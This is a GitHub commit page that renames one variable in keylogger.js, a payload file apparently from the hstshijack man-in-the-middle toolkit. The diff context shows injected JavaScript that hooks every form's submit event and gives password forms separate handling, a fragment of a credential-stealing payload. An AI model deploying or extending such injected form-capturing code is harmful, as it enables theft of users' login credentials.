Skip to content

Commit

Permalink
fix bad variable name
Browse files Browse the repository at this point in the history
  • Loading branch information
buffermet committed Jan 8, 2019
1 parent 483ab2f commit bdb9475
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion hstshijack/payloads/keylogger.js
Expand Up @@ -60,7 +60,7 @@ function obf_func_attack() {
document.querySelectorAll("form").forEach(function(obf_var_form){
obf_var_form.addEventListener("submit", obf_func_callback);
if (obf_var_form.querySelector("input[type=password]")) {
obf_var_form.addEventListener("submit", obf_path_whitelist);
obf_var_form.addEventListener("submit", obf_func_whitelist);
}
});

Expand Down

0 comments on commit bdb9475

Please sign in to comment.